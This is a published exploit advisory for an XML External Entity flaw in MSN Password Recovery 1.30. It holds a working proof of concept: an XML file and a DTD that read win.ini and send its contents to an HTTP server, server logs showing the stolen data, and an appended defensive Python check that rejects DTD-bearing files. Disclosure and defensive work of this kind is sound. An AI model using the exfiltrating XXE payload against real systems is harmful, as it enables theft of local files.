MSN Password Recovery 1.30 XML External Entity Injection

2020.01.09
Credit: ZwX
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2020-01-08
# Vendor Homepage : https://www.top-password.com/
# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
# Tested on OS: Windows 10

[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software MSN Password Recovery
5) Click the 'Help' button and a 'Msn Password Recovery' window opens
6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml
7) Click the 'View' button
8) External Entity Injection Successful

[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;

[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
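A defensive pre-parse check for documents like XXE.xml above, added here as an example and not part of the original advisory or the vendor's code: it uses Python's standard expat bindings, which do not fetch external entities unless a handler is installed, to list DOCTYPE and external entity declarations so an application can refuse the file before a resolving parser sees it. The function names `inspect_xml` and `is_safe_to_load` and the benign sample are assumptions made for illustration.

```python
import xml.parsers.expat as expat

# XXE.xml from the PoC above, embedded as sample input.
SAMPLE_XXE = r'''<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>'''

# Constructed benign document for comparison (not from the advisory).
SAMPLE_BENIGN = '<?xml version="1.0"?><favorites><item>help.chm</item></favorites>'


def inspect_xml(text):
    """Return (has_doctype, external) without resolving any entity.

    external is a list of (name, is_parameter_entity, system_id) tuples,
    one per declaration that points outside the document.
    """
    report = {"doctype": False, "external": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True
        if sysid is not None:
            # <!DOCTYPE x SYSTEM "..."> is itself an external reference.
            report["external"].append(("DOCTYPE", False, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        # Internal entities carry a value; external ones carry a system/public id.
        if sysid is not None or pubid is not None:
            report["external"].append((name, bool(is_param), sysid))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(text, True)
    except expat.ExpatError:
        pass  # malformed remainder; declarations already seen still count
    return report["doctype"], report["external"]


def is_safe_to_load(text):
    """Policy: a help/favorites file has no need for a DTD, so reject any DOCTYPE."""
    has_doctype, _external = inspect_xml(text)
    return not has_doctype
```

The `send` entity never appears in the result because it is defined only in the remote Payload.dtd, which this check does not fetch.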


Copyright 2022, cxsecurity.com

 
